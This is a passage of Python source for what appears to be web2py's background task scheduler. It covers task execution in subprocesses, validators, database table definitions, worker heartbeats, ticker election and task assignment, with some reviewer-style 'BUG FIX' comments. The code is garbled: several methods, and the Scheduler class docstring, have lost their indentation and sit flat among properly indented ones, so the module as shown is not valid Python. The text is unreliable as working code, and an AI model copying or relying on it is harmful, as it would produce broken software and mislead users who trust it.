            #logging.getLogger().setLevel(logging.WARN)
            # support for task.app like 'app/controller'
            (a, c, f) = parse_path_info(task.app)
            _env = env(a=a, c=c, import_models=True,
                       extra_request={'is_scheduler': True})
            #logging.getLogger().setLevel(level)
            f = task.function
            functions = current._scheduler.tasks
            if functions:
                _function = functions.get(f)
            else:
                # look into env
                _function = _env.get(f)
            if not isinstance(_function, CALLABLETYPES):
                raise NameError(
                    "name '%s' not found in scheduler's environment" % f)
            # Inject W2P_TASK into environment
            _env.update({'W2P_TASK': W2P_TASK})
            # Inject W2P_TASK into current
            current.W2P_TASK = W2P_TASK
            globals().update(_env)
            args = _decode_list(loads(task.args))
            vars = loads(task.vars, object_hook=_decode_dict)
            result = dumps(_function(*args, **vars))
        else:
            # for testing purpose only
            result = eval(task.function)(
                *loads(task.args, object_hook=_decode_dict),
                **loads(task.vars, object_hook=_decode_dict))
        if len(result) >= 1024:
            # large results are spooled to a temp file; only the path
            # (prefixed with RESULTINFILE) travels through the queue
            fd, temp_path = tempfile.mkstemp(suffix='.w2p_sched')
            with os.fdopen(fd, 'w') as f:
                f.write(result)
            result = RESULTINFILE + temp_path
        retq.put(TaskReport('COMPLETED', result=result))
    except:
        # any failure is reported together with its traceback
        tb = traceback.format_exc()
        retq.put(TaskReport('FAILED', tb=tb))
    finally:
        stdout.close()
class IS_CRONLINE(object):
    """web2py-style validator accepting only parsable cron expressions
    (see CronParser).
    """

    def __init__(self, error_message=None):
        self.error_message = error_message

    def __call__(self, value, record_id=None):
        parser = CronParser(value, datetime.datetime.now())
        try:
            parser.next()
        except ValueError as e:
            # invalid: report either the parser error or the custom message
            if not self.error_message:
                return (value, e)
            return (value, self.error_message)
        return (value, None)
class TYPE(object):
    """
    Validator that checks whether a field is valid json and validates
    its type. Used for `args` and `vars` of the scheduler_task table.
    """

    def __init__(self, myclass=list, parse=False):
        self.myclass = myclass
        self.parse = parse

    def __call__(self, value, record_id=None):
        from gluon import current
        try:
            obj = loads(value)
        except:
            return (value, current.T('invalid json'))
        if not isinstance(obj, self.myclass):
            return (value, current.T('Not of type: %s') % self.myclass)
        # valid: return the parsed object or the raw string as requested
        return (obj if self.parse else value, None)
# legal values for scheduler_task.status
TASK_STATUS = (QUEUED, RUNNING, COMPLETED, FAILED, TIMEOUT, STOPPED, EXPIRED)
# legal values for scheduler_run.status
RUN_STATUS = (RUNNING, COMPLETED, FAILED, TIMEOUT, STOPPED)
# legal values (statuses and commands) for scheduler_worker.status
WORKER_STATUS = (ACTIVE, PICK, DISABLED, TERMINATE, KILL, STOP_TASK)
class Scheduler(threading.Thread):
"""Scheduler object
Args:
db: DAL connection where Scheduler will create its tables
tasks(dict): either a dict containing name-->func or None.
If None, functions will be searched in the environment
migrate(bool): turn migration on/off for the Scheduler's tables
worker_name(str): force worker_name to identify each process.
Leave it to None to autoassign a name (hostname#pid)
group_names(list): process tasks belonging to this group
defaults to ['main'] if nothing gets passed
heartbeat(int): how many seconds the worker sleeps between one
execution and the following one. Indirectly sets how many seconds
will pass between checks for new tasks
max_empty_runs(int): how many loops are allowed to pass without
processing any tasks before exiting the process. 0 to keep always
the process alive
discard_results(bool): Scheduler stores executions's details into the
scheduler_run table. By default, only if there is a result the
details are kept. Turning this to True means discarding results
even for tasks that return something
utc_time(bool): do all datetime calculations assuming UTC as the
timezone. Remember to pass `start_time` and `stop_time` to tasks
accordingly
"""
def __init__(self, db, tasks=None, migrate=True,
worker_name=None, group_names=None, heartbeat=HEARTBEAT,
max_empty_runs=0, discard_results=False, utc_time=False):
threading.Thread.__init__(self)
self.setDaemon(True)
self.process = None # the background process
self.process_queues = (None, None)
self.have_heartbeat = True # set to False to kill
self.empty_runs = 0
self.db = db
self.db_thread = None
self.tasks = tasks
self.group_names = group_names or ['main']
self.heartbeat = heartbeat
self.worker_name = worker_name or IDENTIFIER
self.max_empty_runs = max_empty_runs
self.discard_results = discard_results
self.is_a_ticker = False
self.do_assign_tasks = False
self.greedy = False
self.utc_time = utc_time
self.w_stats_lock = threading.RLock()
self.w_stats = Storage(
dict(
status=RUNNING,
sleep=heartbeat,
total=0,
errors=0,
empty_runs=0,
queue=0,
distribution=None,
workers=0)
) # dict holding statistics
from gluon import current
current._scheduler = self
self.define_tables(db, migrate=migrate)
    def execute(self, task):
        """Start the background process.

        Spawns `executor` in a separate process, periodically saves its
        partial output into scheduler_run.run_output, and enforces the
        task timeout.

        Args:
            task : a `Task` object

        Returns:
            a `TaskReport` object
        """
        outq = multiprocessing.Queue()
        retq = multiprocessing.Queue(maxsize=1)
        self.process = p = \
            multiprocessing.Process(target=executor, args=(retq, task, outq))
        self.process_queues = (retq, outq)
        logger.debug(' task starting')
        p.start()
        start = time.time()
        # sync_output > 0 means "save partial output every n seconds"
        if task.sync_output > 0:
            run_timeout = task.sync_output
        else:
            run_timeout = task.timeout
        task_output = tout = ''
        try:
            while p.is_alive() and (not task.timeout or
                                    time.time() - start < task.timeout):
                # NOTE: try always to empty the out queue before
                # the child process is joined,
                # see "Joining processes that use queues" section in
                # https://docs.python.org/2/library/multiprocessing.html#programming-guidelines
                # https://docs.python.org/3/library/multiprocessing.html#programming-guidelines
                while True:
                    try:
                        tout += outq.get(timeout=2)
                    except Queue.Empty:
                        break
                if tout:
                    logger.debug(' partial output: "%s"', tout)
                    if CLEAROUT in tout:
                        # the task asked to discard everything printed
                        # before the last CLEAROUT marker
                        task_output = tout[
                            tout.rfind(CLEAROUT) + len(CLEAROUT):]
                    else:
                        task_output += tout
                    try:
                        db = self.db
                        db(db.scheduler_run.id == task.run_id).update(run_output=task_output)
                        db.commit()
                        tout = ''
                        logger.debug(' partial output saved')
                    except Exception:
                        logger.exception(' error while saving partial output')
                        # undo the premature append; tout is retried next round
                        task_output = task_output[:-len(tout)]
                p.join(timeout=run_timeout)
        except:
            logger.exception(' task stopped by general exception')
            self.terminate_process()
            tr = TaskReport(STOPPED)
        else:
            if p.is_alive():
                # loop above exited because of the timeout
                logger.debug(' task timeout')
                self.terminate_process(flush_ret=False)
                try:
                    # we try to get a traceback here
                    tr = retq.get(timeout=2)  # NOTE: risky after terminate
                    tr.status = TIMEOUT
                    tr.output = task_output
                except Queue.Empty:
                    tr = TaskReport(TIMEOUT)
            else:
                try:
                    tr = retq.get_nowait()
                except Queue.Empty:
                    logger.debug(' task stopped')
                    tr = TaskReport(STOPPED)
                else:
                    logger.debug(' task completed or failed')
                    result = tr.result
                    if result and result.startswith(RESULTINFILE):
                        # large results were spooled to a temp file by executor
                        temp_path = result.replace(RESULTINFILE, '', 1)
                        with open(temp_path) as f:
                            tr.result = f.read()
                        os.unlink(temp_path)
        tr.output = task_output
        return tr
    # guards terminate_process(), which can be entered concurrently
    # by the main thread and the heartbeat thread
    _terminate_process_lock = threading.RLock()
    def terminate_process(self, flush_out=True, flush_ret=True):
        """Terminate any running tasks (internal use only)

        Drains the requested process queues first (so terminate/join
        cannot deadlock on a full queue), then terminates and joins the
        background process.
        """
        if self.process is not None:
            # must synchronize since we are called by main and heartbeat thread
            with self._terminate_process_lock:
                if flush_out:
                    queue = self.process_queues[1]
                    while not queue.empty():  # NOTE: empty() is not reliable
                        try:
                            queue.get_nowait()
                        except Queue.Empty:
                            pass
                if flush_ret:
                    queue = self.process_queues[0]
                    while not queue.empty():
                        try:
                            queue.get_nowait()
                        except Queue.Empty:
                            pass
                logger.debug('terminating process')
                try:
                    # NOTE: terminate should not be called when using shared
                    # resources, see "Avoid terminating processes"
                    # section in
                    # https://docs.python.org/2/library/multiprocessing.html#programming-guidelines
                    # https://docs.python.org/3/library/multiprocessing.html#programming-guidelines
                    self.process.terminate()
                    # NOTE: calling join after a terminate is risky,
                    # as explained in "Avoid terminating processes"
                    # section this can lead to a deadlock
                    self.process.join()
                finally:
                    self.process = None
    def die(self):
        """Forces termination of the worker process along with any running
        task"""
        logger.info('die!')
        self.have_heartbeat = False  # stops the heartbeat thread's loop
        self.terminate_process()
    def give_up(self):
        """Waits for any running task to be executed, then exits the worker
        process"""
        logger.info('Giving up as soon as possible!')
        # unlike die(), the current task (if any) is left running
        self.have_heartbeat = False
def run(self):
"""This is executed by the heartbeat thread"""
counter = 0
while self.have_heartbeat:
self.send_heartbeat(counter)
counter += 1
    def start_heartbeats(self):
        # start the thread: its run() method sends heartbeats forever
        self.start()
def __get_migrate(self, tablename, migrate=True):
if migrate is False:
return False
elif migrate is True:
return True
elif isinstance(migrate, str):
return "%s%s.table" % (migrate, tablename)
return True
def now(self):
"""Shortcut that fetches current time based on UTC preferences."""
return self.utc_time and datetime.datetime.utcnow() or datetime.datetime.now()
    def set_requirements(self, scheduler_task):
        """Called to set defaults for lazy_tables connections."""
        from gluon import current
        # when running inside a web2py request, default the task's
        # application_name to the current app/controller pair
        if hasattr(current, 'request'):
            scheduler_task.application_name.default = '%s/%s' % (
                current.request.application, current.request.controller
            )
    def define_tables(self, db, migrate):
        """Define Scheduler tables structure.

        Creates scheduler_task, scheduler_run, scheduler_worker and
        scheduler_task_deps on the given DAL connection.
        """
        from pydal.base import DEFAULT
        logger.debug('defining tables (migrate=%s)', migrate)
        now = self.now
        # the queue of tasks to execute
        db.define_table(
            'scheduler_task',
            Field('application_name', requires=IS_NOT_EMPTY(),
                  default=None, writable=False),
            Field('task_name', default=None),
            Field('group_name', default='main'),
            Field('status', requires=IS_IN_SET(TASK_STATUS),
                  default=QUEUED, writable=False),
            Field('broadcast', 'boolean', default=False),
            Field('function_name',
                  requires=IS_IN_SET(sorted(self.tasks.keys()))
                  if self.tasks else DEFAULT),
            Field('uuid', length=255,
                  requires=IS_NOT_IN_DB(db, 'scheduler_task.uuid'),
                  unique=True, default=web2py_uuid),
            Field('args', 'text', default='[]', requires=TYPE(list)),
            Field('vars', 'text', default='{}', requires=TYPE(dict)),
            Field('enabled', 'boolean', default=True),
            Field('start_time', 'datetime', default=now,
                  requires=IS_DATETIME()),
            Field('next_run_time', 'datetime', default=now),
            Field('stop_time', 'datetime'),
            Field('repeats', 'integer', default=1, comment="0=unlimited",
                  requires=IS_INT_IN_RANGE(0, None)),
            Field('retry_failed', 'integer', default=0, comment="-1=unlimited",
                  requires=IS_INT_IN_RANGE(-1, None)),
            Field('period', 'integer', default=60, comment='seconds',
                  requires=IS_INT_IN_RANGE(0, None)),
            Field('prevent_drift', 'boolean', default=False,
                  comment='Exact start_times between runs'),
            Field('cronline', default=None,
                  comment='Discard "period", use this cron expr instead',
                  requires=IS_EMPTY_OR(IS_CRONLINE())),
            Field('timeout', 'integer', default=60, comment='seconds',
                  requires=IS_INT_IN_RANGE(1, None)),
            Field('sync_output', 'integer', default=0,
                  comment="update output every n sec: 0=never",
                  requires=IS_INT_IN_RANGE(0, None)),
            Field('times_run', 'integer', default=0, writable=False),
            Field('times_failed', 'integer', default=0, writable=False),
            Field('last_run_time', 'datetime', writable=False, readable=False),
            Field('assigned_worker_name', default='', writable=False),
            on_define=self.set_requirements,
            migrate=self.__get_migrate('scheduler_task', migrate),
            format='(%(id)s) %(task_name)s')
        # one record per (attempted) execution of a task
        db.define_table(
            'scheduler_run',
            Field('task_id', 'reference scheduler_task'),
            Field('status', requires=IS_IN_SET(RUN_STATUS)),
            Field('start_time', 'datetime'),
            Field('stop_time', 'datetime'),
            Field('run_output', 'text'),
            Field('run_result', 'text'),
            Field('traceback', 'text'),
            Field('worker_name', default=self.worker_name),
            migrate=self.__get_migrate('scheduler_run', migrate)
        )
        # one record per live worker process
        db.define_table(
            'scheduler_worker',
            Field('worker_name', length=255, unique=True),
            Field('first_heartbeat', 'datetime'),
            Field('last_heartbeat', 'datetime'),
            Field('status', requires=IS_IN_SET(WORKER_STATUS)),
            Field('is_ticker', 'boolean', default=False, writable=False),
            Field('group_names', 'list:string', default=self.group_names),
            Field('worker_stats', 'json'),
            migrate=self.__get_migrate('scheduler_worker', migrate)
        )
        # dependency edges between tasks (see JobGraph)
        db.define_table(
            'scheduler_task_deps',
            Field('job_name', default='job_0'),
            Field('task_parent', 'integer',
                  requires=IS_IN_DB(db, 'scheduler_task.id', '%(task_name)s')
                  ),
            Field('task_child', 'reference scheduler_task'),
            Field('can_visit', 'boolean', default=False),
            migrate=self.__get_migrate('scheduler_task_deps', migrate)
        )
        if migrate is not False:
            db.commit()
    def loop(self, worker_name=None):
        """Main loop.

        This works basically as a neverending loop that:

        - checks if the worker is ready to process tasks (is not DISABLED)
        - pops a task from the queue
        - if there is a task:

          - spawns the executor background process
          - waits for the process to be finished
          - sleeps `heartbeat` seconds

        - if there is not a task:

          - checks for max_empty_runs
          - sleeps `heartbeat` seconds

        NOTE(review): the worker_name parameter is unused here; it looks
        kept only for API compatibility — confirm against callers.
        """
        # make SIGTERM behave like SystemExit so the except below runs
        signal.signal(signal.SIGTERM, lambda signum, stack_frame: sys.exit(1))
        try:
            self.start_heartbeats()
            while self.have_heartbeat:
                with self.w_stats_lock:
                    is_disabled = self.w_stats.status == DISABLED
                if is_disabled:
                    logger.debug('Someone stopped me, sleeping until better'
                                 ' times come (%s)', self.w_stats.sleep)
                    self.sleep()
                    continue
                logger.debug('looping...')
                if self.is_a_ticker and self.do_assign_tasks:
                    # I'm a ticker, and 5 loops passed without
                    # reassigning tasks, let's do that
                    self.wrapped_assign_tasks()
                task = self.wrapped_pop_task()
                if task:
                    with self.w_stats_lock:
                        self.w_stats.empty_runs = 0
                        self.w_stats.status = RUNNING
                        self.w_stats.total += 1
                    self.wrapped_report_task(task, self.execute(task))
                    with self.w_stats_lock:
                        if not self.w_stats.status == DISABLED:
                            self.w_stats.status = ACTIVE
                else:
                    with self.w_stats_lock:
                        self.w_stats.empty_runs += 1
                        if self.max_empty_runs != 0:
                            logger.debug('empty runs %s/%s',
                                         self.w_stats.empty_runs,
                                         self.max_empty_runs)
                            if self.w_stats.empty_runs >= self.max_empty_runs:
                                logger.info(
                                    'empty runs limit reached, killing myself')
                                self.die()
                if self.is_a_ticker and self.greedy:
                    # there could be other tasks ready to be assigned
                    logger.info('TICKER: greedy loop')
                    self.wrapped_assign_tasks()
                logger.debug('sleeping...')
                self.sleep()
        except (KeyboardInterrupt, SystemExit):
            logger.info('catched')
            self.die()
def wrapped_pop_task(self):
"""Commodity function to call `pop_task` and trap exceptions.
If an exception is raised, assume it happened because of database
contention and retries `pop_task` after 0.5 seconds
"""
db = self.db
db.commit() # for MySQL only; FIXME: Niphlod, still needed? could avoid when not MySQL?
for x in range(10):
try:
return self.pop_task()
except Exception:
logger.exception(' error popping tasks')
self.w_stats.errors += 1
db.rollback()
time.sleep(0.5)
    def pop_task(self):
        """Grab a task ready to be executed from the queue.

        Also computes the task's next_run_time and inserts the
        matching scheduler_run record.

        Returns:
            a `Task` object, or None when there is nothing to do
        """
        now = self.now()
        db = self.db
        st = db.scheduler_task
        # only tasks the ticker already assigned to this worker
        grabbed = db(
            (st.assigned_worker_name == self.worker_name) &
            (st.status == ASSIGNED)
        )
        task = grabbed.select(limitby=(0, 1), orderby=st.next_run_time).first()
        if task:
            # none will touch my task!
            task.update_record(status=RUNNING, last_run_time=now)
            db.commit()
            logger.debug(' work to do %s', task.id)
        else:
            logger.info('nothing to do')
            return None
        # compute when the task should run next
        if task.cronline:
            cron_recur = CronParser(task.cronline,
                                    now.replace(second=0, microsecond=0))
            next_run_time = cron_recur.next()
        elif not task.prevent_drift:
            next_run_time = task.last_run_time + datetime.timedelta(
                seconds=task.period
            )
        else:
            # calc next_run_time based on available slots
            # see #1191
            next_run_time = task.start_time
            secondspassed = (now - next_run_time).total_seconds()
            times = secondspassed // task.period + 1
            next_run_time += datetime.timedelta(seconds=task.period * times)
        times_run = task.times_run + 1
        if times_run < task.repeats or task.repeats == 0:
            # need to run (repeating task)
            run_again = True
        else:
            # no need to run again
            run_again = False
        run_id = 0
        while not self.discard_results:  # FIXME: forever?
            logger.debug(' new scheduler_run record')
            try:
                run_id = db.scheduler_run.insert(
                    task_id=task.id,
                    status=RUNNING,
                    start_time=now,
                    worker_name=self.worker_name)
                db.commit()
                break
            except Exception:
                logger.exception(' error inserting scheduler_run')
                db.rollback()
                time.sleep(0.5)
        logger.info('new task %(id)s "%(task_name)s"'
                    ' %(application_name)s.%(function_name)s' % task)
        return Task(
            app=task.application_name,
            function=task.function_name,
            timeout=task.timeout,
            args=task.args,  # in json
            vars=task.vars,  # in json
            task_id=task.id,
            run_id=run_id,
            run_again=run_again,
            next_run_time=next_run_time,
            times_run=times_run,
            stop_time=task.stop_time,
            retry_failed=task.retry_failed,
            times_failed=task.times_failed,
            sync_output=task.sync_output,
            uuid=task.uuid)
    def wrapped_report_task(self, task, task_report):
        """Commodity function to call `report_task` and trap exceptions.

        If an exception is raised, assume it happened because of database
        contention and retries `report_task` after 0.5 seconds
        """
        db = self.db
        while True:  # FIXME: forever?
            try:
                self.report_task(task, task_report)
                db.commit()
                break
            except Exception:
                logger.exception(' error storing result')
                db.rollback()
                time.sleep(0.5)
    def report_task(self, task, task_report):
        """Take care of storing the result according to preferences.

        Deals with logic for repeating tasks: updates the scheduler_run
        record (or deletes it) and moves the scheduler_task record to its
        next status (QUEUED/COMPLETED/EXPIRED/FAILED/TIMEOUT).
        """
        now = self.now()
        db = self.db
        st = db.scheduler_task
        sr = db.scheduler_run
        if not self.discard_results:
            if task_report.result != 'null' or task_report.tb:
                # result is 'null' as a string if task completed
                # if it's stopped it's None as NoneType, so we record
                # the STOPPED "run" anyway
                logger.debug(' recording task report in db (%s)',
                             task_report.status)
                db(sr.id == task.run_id).update(
                    status=task_report.status,
                    stop_time=now,
                    run_result=task_report.result,
                    run_output=task_report.output,
                    traceback=task_report.tb)
            else:
                logger.debug(' deleting task report in db because of no result')
                db(sr.id == task.run_id).delete()
        # if there is a stop_time and the following run would exceed it
        is_expired = (task.stop_time and
                      task.next_run_time > task.stop_time or
                      False)
        status = (task.run_again and is_expired and EXPIRED or
                  task.run_again and not is_expired and QUEUED or
                  COMPLETED)
        if task_report.status == COMPLETED:
            # successful run: reset the failure counter and requeue/expire
            d = dict(status=status,
                     next_run_time=task.next_run_time,
                     times_run=task.times_run,
                     times_failed=0
                     )
            db(st.id == task.task_id).update(**d)
            if status == COMPLETED:
                self.update_dependencies(task.task_id)
        else:
            # failed/timed-out/stopped run: requeue only if retries remain
            st_mapping = {'FAILED': 'FAILED',
                          'TIMEOUT': 'TIMEOUT',
                          'STOPPED': 'FAILED'}[task_report.status]
            status = (task.retry_failed
                      and task.times_failed < task.retry_failed
                      and QUEUED or task.retry_failed == -1
                      and QUEUED or st_mapping)
            db(st.id == task.task_id).update(
                times_failed=st.times_failed + 1,
                next_run_time=task.next_run_time,
                status=status
            )
        logger.info('task completed (%s)', task_report.status)
def update_dependencies(self, task_id):
"""Unblock execution paths for Jobs."""
db = self.db
db(db.scheduler_task_deps.task_child == task_id).update(can_visit=True)
def adj_hibernation(self):
"""Used to increase the "sleep" interval for DISABLED workers."""
with self.w_stats_lock:
if self.w_stats.status == DISABLED:
wk_st = self.w_stats.sleep
hibernation = wk_st + HEARTBEAT if wk_st < MAXHIBERNATION else MAXHIBERNATION
self.w_stats.sleep = hibernation
    def send_heartbeat(self, counter):
        """Coordination among available workers.

        It:

        - sends the heartbeat
        - elects a ticker among available workers (the only process that
          effectively dispatch tasks to workers)
        - deals with worker's statuses
        - does "housecleaning" for dead workers
        - triggers tasks assignment to workers
        """
        if self.db_thread:
            # BKR 20180612 check if connection still works
            try:
                self.db_thread(self.db_thread.scheduler_worker).count()
            except self.db_thread._adapter.connection.OperationalError:
                # if not -> throw away self.db_thread and force reconnect
                self.db_thread = None
        if not self.db_thread:
            # each thread needs its own DAL connection
            logger.debug('thread building own DAL object')
            self.db_thread = DAL(
                self.db._uri, folder=self.db._adapter.folder, decode_credentials=True)
            self.define_tables(self.db_thread, migrate=False)
        try:
            now = self.now()
            db = self.db_thread
            sw = db.scheduler_worker
            st = db.scheduler_task
            # record heartbeat
            row = db(sw.worker_name == self.worker_name).select().first()
            with self.w_stats_lock:
                if not row:
                    # first heartbeat ever: register this worker
                    sw.insert(status=ACTIVE, worker_name=self.worker_name,
                              first_heartbeat=now, last_heartbeat=now,
                              group_names=self.group_names,
                              worker_stats=self.w_stats)
                    self.w_stats.status = ACTIVE
                    self.w_stats.sleep = self.heartbeat
                    backed_status = ACTIVE
                else:
                    # honor the status stored in the db (it may have been
                    # changed externally to command this worker)
                    backed_status = row.status
                    if backed_status == DISABLED:
                        # keep sleeping
                        self.w_stats.status = DISABLED
                        logger.debug('........recording heartbeat (DISABLED)')
                        db(sw.worker_name == self.worker_name).update(
                            last_heartbeat=now,
                            worker_stats=self.w_stats)
                    elif backed_status == TERMINATE:
                        self.w_stats.status = TERMINATE
                        logger.debug("Waiting to terminate the current task")
                        self.give_up()
                    elif backed_status == KILL:
                        self.w_stats.status = KILL
                        self.die()
                        return
                    else:
                        if backed_status == STOP_TASK:
                            logger.info('Asked to kill the current task')
                            self.terminate_process()
                        logger.debug('........recording heartbeat (%s)',
                                     self.w_stats.status)
                        db(sw.worker_name == self.worker_name).update(
                            last_heartbeat=now, status=ACTIVE,
                            worker_stats=self.w_stats)
                        self.w_stats.sleep = self.heartbeat  # re-activating the process
                        if self.w_stats.status != RUNNING:
                            self.w_stats.status = ACTIVE
            self.do_assign_tasks = False
            # housecleaning runs every 5 heartbeats (or when PICKed)
            if counter % 5 == 0 or backed_status == PICK:
                try:
                    # delete dead workers
                    expiration = now - datetime.timedelta(
                        seconds=self.heartbeat * 3)
                    departure = now - datetime.timedelta(
                        seconds=self.heartbeat * 3 * 15)
                    logger.debug(
                        ' freeing workers that have not sent heartbeat')
                    dead_workers = db(
                        ((sw.last_heartbeat < expiration) & (sw.status == ACTIVE)) |
                        ((sw.last_heartbeat < departure) & (sw.status != ACTIVE))
                    )
                    dead_workers_name = dead_workers._select(sw.worker_name)
                    # requeue tasks that dead workers were running
                    db(
                        (st.assigned_worker_name.belongs(dead_workers_name)) &
                        (st.status == RUNNING)
                    ).update(assigned_worker_name='', status=QUEUED)
                    dead_workers.delete()
                    try:
                        self.is_a_ticker = self.being_a_ticker()
                    except:
                        logger.exception('Error coordinating TICKER')
                    with self.w_stats_lock:
                        if self.w_stats.status == ACTIVE:
                            self.do_assign_tasks = True
                except:
                    logger.exception('Error cleaning up')
            db.commit()
        except:
            logger.exception('Error retrieving status')
            db.rollback()
        self.adj_hibernation()
        self.sleep()
def being_a_ticker(self):
    """Elect a TICKER process that assigns tasks to available workers.

    Does its best to elect a worker that is not busy processing other tasks
    to allow a proper distribution of tasks among all active workers ASAP.

    Returns:
        bool: True if this worker holds (or just acquired) the ticker
        role, False if another active worker is already the ticker.
    """
    # use the dedicated per-thread DAL connection
    db = self.db_thread
    sw = db.scheduler_worker
    my_name = self.worker_name
    # every other ACTIVE worker (this one excluded)
    all_active = db(
        (sw.worker_name != my_name) & (sw.status == ACTIVE)
    ).select(sw.is_ticker, sw.worker_name)
    ticker = all_active.find(lambda row: row.is_ticker is True).first()
    with self.w_stats_lock:
        not_busy = self.w_stats.status == ACTIVE
    if not ticker:
        # if no other tickers are around
        if not_busy:
            # only if I'm not busy: claim the ticker flag and clear it
            # on everybody else
            db(sw.worker_name == my_name).update(is_ticker=True)
            db(sw.worker_name != my_name).update(is_ticker=False)
            logger.info("TICKER: I'm a ticker")
        else:
            # I'm busy
            if len(all_active) >= 1:
                # so I'll "downgrade" myself to a "poor worker"
                db(sw.worker_name == my_name).update(is_ticker=False)
            else:
                # nobody else is alive: better a busy ticker than none
                not_busy = True
        db.commit()
        return not_busy
    else:
        logger.info(
            "%s is a ticker, I'm a poor worker" % ticker.worker_name)
        return False
def wrapped_assign_tasks(self):
    """Commodity function to call `assign_tasks` and trap exceptions.

    If an exception is raised, assume it happened because of database
    contention and retry `assign_tasks` after 0.5 seconds, up to ten
    attempts in total.
    """
    logger.debug('Assigning tasks...')
    db = self.db
    db.commit()  # for MySQL only; FIXME: Niphlod, still needed? could avoid when not MySQL?
    attempts_left = 10
    while attempts_left:
        attempts_left -= 1
        try:
            self.assign_tasks()
            db.commit()
            logger.debug('Tasks assigned...')
            return
        except Exception:
            # most likely DB contention: record it, roll back and retry
            logger.exception('TICKER: error assigning tasks')
            self.w_stats.errors += 1
            db.rollback()
            time.sleep(0.5)
def assign_tasks(self):
    """Assign tasks to workers, that can then pop them from the queue.

    Deals with group_name(s) logic, in order to assign tasks linearly
    to available workers for those groups.
    """
    now = self.now()
    db = self.db
    sw = db.scheduler_worker
    st = db.scheduler_task
    sd = db.scheduler_task_deps
    all_workers = db(sw.status == ACTIVE).select()
    # build workers as dict of groups; workers currently RUNNING a task
    # are skipped so new tasks land on idle workers
    wkgroups = {}
    for w in all_workers:
        if w.worker_stats['status'] == 'RUNNING':
            continue
        group_names = w.group_names
        for gname in group_names:
            if gname not in wkgroups:
                wkgroups[gname] = dict(
                    workers=[{'name': w.worker_name, 'c': 0}])
            else:
                wkgroups[gname]['workers'].append(
                    {'name': w.worker_name, 'c': 0})
    # set queued tasks that expired between "runs" (i.e., you turned off
    # the scheduler): then it wasn't expired, but now it is
    db(
        (st.status.belongs((QUEUED, ASSIGNED))) &
        (st.stop_time < now)
    ).update(status=EXPIRED)
    # calculate dependencies: children whose pending parents are all done
    deps_with_no_deps = db(
        (sd.can_visit == False) &
        (~sd.task_child.belongs(
            db(sd.can_visit == False)._select(sd.task_parent)
        )
        )
    )._select(sd.task_child)
    no_deps = db(
        (st.status.belongs((QUEUED, ASSIGNED))) &
        (
            (sd.id == None) | (st.id.belongs(deps_with_no_deps))
        )
    )._select(st.id, distinct=True, left=sd.on(
        (st.id == sd.task_parent) &
        (sd.can_visit == False)
    )
    )
    all_available = db(
        (st.status.belongs((QUEUED, ASSIGNED))) &
        (st.next_run_time <= now) &
        (st.enabled == True) &
        (st.id.belongs(no_deps))
    )
    # BUG FIX: `50 / ...` is float division on Python 3, which produced a
    # float `limit` (invalid for limitby and for the greediness check
    # below); integer division restores the intended behavior.
    limit = len(all_workers) * (50 // (len(wkgroups) or 1))
    # if there are a moltitude of tasks, let's figure out a maximum of
    # tasks per worker. This can be further tuned with some added
    # intelligence (like esteeming how many tasks will a worker complete
    # before the ticker reassign them around, but the gain is quite small
    # 50 is a sweet spot also for fast tasks, with sane heartbeat values
    # NB: ticker reassign tasks every 5 cycles, so if a worker completes
    # its 50 tasks in less than heartbeat*5 seconds,
    # it won't pick new tasks until heartbeat*5 seconds pass.
    # If a worker is currently elaborating a long task, its tasks needs to
    # be reassigned to other workers
    # this shuffles up things a bit, in order to give a task equal chances
    # to be executed
    # let's freeze it up
    db.commit()
    tnum = 0
    for group in wkgroups.keys():
        tasks = all_available(st.group_name == group).select(
            limitby=(0, limit), orderby=st.next_run_time)
        # let's break up the queue evenly among workers
        for task in tasks:
            tnum += 1
            gname = task.group_name
            ws = wkgroups.get(gname)
            if ws:
                if task.broadcast:
                    # broadcast task: clone it once per worker of the group
                    for worker in ws['workers']:
                        new_task = db.scheduler_task.insert(
                            application_name=task.application_name,
                            task_name=task.task_name,
                            group_name=task.group_name,
                            status=ASSIGNED,
                            broadcast=False,
                            function_name=task.function_name,
                            args=task.args,
                            start_time=now,
                            repeats=1,
                            retry_failed=task.retry_failed,
                            sync_output=task.sync_output,
                            assigned_worker_name=worker['name'])
                    # reschedule the broadcasting "parent" task
                    if task.period:
                        next_run_time = now + datetime.timedelta(seconds=task.period)
                    else:
                        # must be cronline
                        cron_recur = CronParser(task.cronline,
                                                now.replace(second=0, microsecond=0))
                        next_run_time = cron_recur.next()
                    db(st.id == task.id).update(times_run=task.times_run + 1,
                                                next_run_time=next_run_time,
                                                last_run_time=now)
                    db.commit()
                else:
                    # BUG FIX: the original scan started `counter` at 0, so
                    # `w['c'] < counter` could never become true and every
                    # task went to the first worker of the group; pick the
                    # actual least-loaded worker instead.
                    myw = min(range(len(ws['workers'])),
                              key=lambda i: ws['workers'][i]['c'])
                    assigned_wn = wkgroups[gname]['workers'][myw]['name']
                    d = dict(
                        status=ASSIGNED,
                        assigned_worker_name=assigned_wn
                    )
                    db(
                        (st.id == task.id) &
                        (st.status.belongs((QUEUED, ASSIGNED)))
                    ).update(**d)
                    wkgroups[gname]['workers'][myw]['c'] += 1
        db.commit()
    # I didn't report tasks but I'm working nonetheless!!!!
    with self.w_stats_lock:
        if tnum > 0:
            self.w_stats.empty_runs = 0
        self.w_stats.queue = tnum
        self.w_stats.distribution = wkgroups
        self.w_stats.workers = len(all_workers)
    # I'll be greedy only if tasks assigned are equal to the limit
    # (meaning there could be others ready to be assigned)
    self.greedy = tnum >= limit
    logger.info('TICKER: workers are %s', len(all_workers))
    logger.info('TICKER: tasks are %s', tnum)
def sleep(self):
    """Pause the worker for the currently configured sleep interval."""
    # should only sleep until next available task
    interval = self.w_stats.sleep
    time.sleep(interval)
def set_worker_status(self, group_names=None, action=ACTIVE,
                      exclude=None, limit=None, worker_name=None):
    """Internal function to set worker's status.

    Args:
        group_names: str or list of group names to target; defaults to
            the groups this Scheduler instance serves
        action: the status to set (ACTIVE, DISABLED, TERMINATE, KILL, ...)
        exclude: list of statuses that must NOT be overwritten
        limit: max number of workers per group to update
        worker_name: target a single worker by name (in that case
            group_names/exclude/limit are ignored)
    """
    db = self.db
    ws = db.scheduler_worker
    if not group_names:
        group_names = self.group_names
    elif isinstance(group_names, str):
        group_names = [group_names]
    if worker_name:
        db(ws.worker_name == worker_name).update(status=action)
        return
    # BUG FIX: the original `exclude and exclude.append(action) or [action]`
    # always collapsed to [action] (list.append returns None), silently
    # dropping the `exclude` statuses and mutating the caller's list.
    # Build a fresh list that honors both.
    exclusion = list(exclude) + [action] if exclude else [action]
    if not limit:
        for group in group_names:
            db(
                (ws.group_names.contains(group)) &
